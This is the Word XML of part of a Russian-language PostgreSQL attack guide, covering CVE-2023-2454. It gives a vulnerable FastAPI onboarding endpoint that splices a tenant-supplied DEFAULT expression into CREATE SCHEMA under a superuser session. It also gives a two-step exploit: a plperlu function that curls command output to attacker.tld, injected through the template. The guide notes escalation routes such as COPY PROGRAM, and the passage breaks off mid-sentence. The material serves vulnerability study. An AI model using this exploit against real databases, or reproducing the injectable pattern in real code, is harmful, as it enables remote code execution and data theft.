    <w:p w14:paraId="4BDBF418" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SET ROLE» — https://www.postgresql.org/docs/current/sql-set-role.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50301A74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SET SESSION AUTHORIZATION» — https://www.postgresql.org/docs/current/sql-set-session-authorization.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073B6E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Release notes 17.1 (раздел Security Fixes) — https://www.postgresql.org/docs/release/17.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C5877" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R8 (sources/research.md, строки 162–170)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701AAEEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.2 search_path hijacking + schema_element (CVE-2023-2454)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB601A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> До PostgreSQL 15.3 (и параллельных minor-фиксов) команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SCHEMA ... &lt;schema_element&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (форма с вложенными CREATE TABLE / VIEW / INDEX / SEQUENCE / TRIGGER внутри одной DDL-команды) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не применяли защитный `search_path = pg_catalog`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> к выражениям, ссылающимся на quaфицированные имена объектов. Атакующий с правом CREATE на БД может предварительно создать функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и встроить её вызов в DDL, которую впоследствии исполнит admin (как часть мульти-tenant onboarding-скрипта, шаблона schema-init и т.п.). Когда admin выполняет CREATE SCHEMA от своей superuser-роли, expressions внутри schema_element вычисляются с привилегиями admin-а — даёт RCE как bootstrap superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4369729A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E541D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/admin/tenant_onboarding.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDB208"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0E339A0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9A097"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42829FB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_superuser_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283607D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD6E30C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD12272" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B233626" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/admin/tenants/{tenant_id}/init")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E11544" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def init_tenant_schema(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F993CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A78E2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    template_name: str,  # имя шаблона, из которого берётся DEFAULT-выражение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105BCAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_superuser_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1423DD0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE39835" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # DBA-инструмент: создаёт схему tenant_X с таблицей из шаблона</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52FF59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    default_expr = await _load_template_default(template_name)  # из app.templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571AC7DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972042F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE SCHEMA tenant_{tenant_id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661760EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          CREATE TABLE accounts (id serial, balance numeric DEFAULT {default_expr});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE6CD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD260E7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC4DDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default_expr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (загруженного из user-controlled источника — например, JSONB-конфига тенанта, который сам тенант может редактировать) внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema_element</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + admin-сессия = условия для CVE-2023-2454.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A41039" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — двухшаговая атака</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F14A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от tenant-роли с правом CREATE на БД, через приложение или прямой SQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379727A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SCHEMA atk;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7F560" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED2BF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION atk.evil() RETURNS numeric LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC25CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  system("curl https://attacker.tld/$(id|base64 -w0)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59031478" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635281E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050EFA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен, потому что admin его установил для legitimate-задач, и USAGE на untrusted-language обычно остаётся у PUBLIC (см. 3.7.2a — typically требует superuser для CREATE FUNCTION; но если admin уже создал SECURITY DEFINER-обёртку, доступ открыт). Альтернативно atk.evil() может быть на trusted plperl/plpython3u с менее опасным телом (для отладки) — RCE сработает при triggering под admin-привилегиями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C068A98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (атакующий настраивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> так, чтобы в JSONB-config попал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t>, и инициирует tenant-onboarding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFDA84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template_name = "evil_template"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E9FA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># содержимое в app.templates['evil_template']['default_expr']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF3E6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># "atk.evil()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323AE95D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (admin-сессия запускает):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191761BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SCHEMA tenant_42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D580B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  CREATE TABLE accounts (id serial, balance numeric DEFAULT atk.evil());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7634D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>До фикса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — выражение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEFAULT atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проверяется на корректность при объявлении DEFAULT, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>немедленно вызывает `atk.evil()`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для type-resolution. Защитный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не помогает, потому что имя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> полностью квалифицировано — search_path вообще не используется при resolution. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется под привилегиями admin (superuser).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A981DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>После фикса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (15.3+/14.8+/...) — PostgreSQL применяет полный security restricted operation (SRO) sandbox к expressions в schema_element, что блокирует исполнение функций других owner-ов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E74BDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> При успешной эксплуатации — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выполняется с привилегиями admin-роли (типично superuser), что даёт RCE-вектор как в 3.7.2a (если функция на plperlu) или эскалацию до admin-роли через SET ROLE / SECURITY DEFINER chain. Из этой точки атакующий доступ к full superuser API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.7.1), CREATE FUNCTION в любом untrusted-языке (3.7.3), доступ ко всем схемам, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
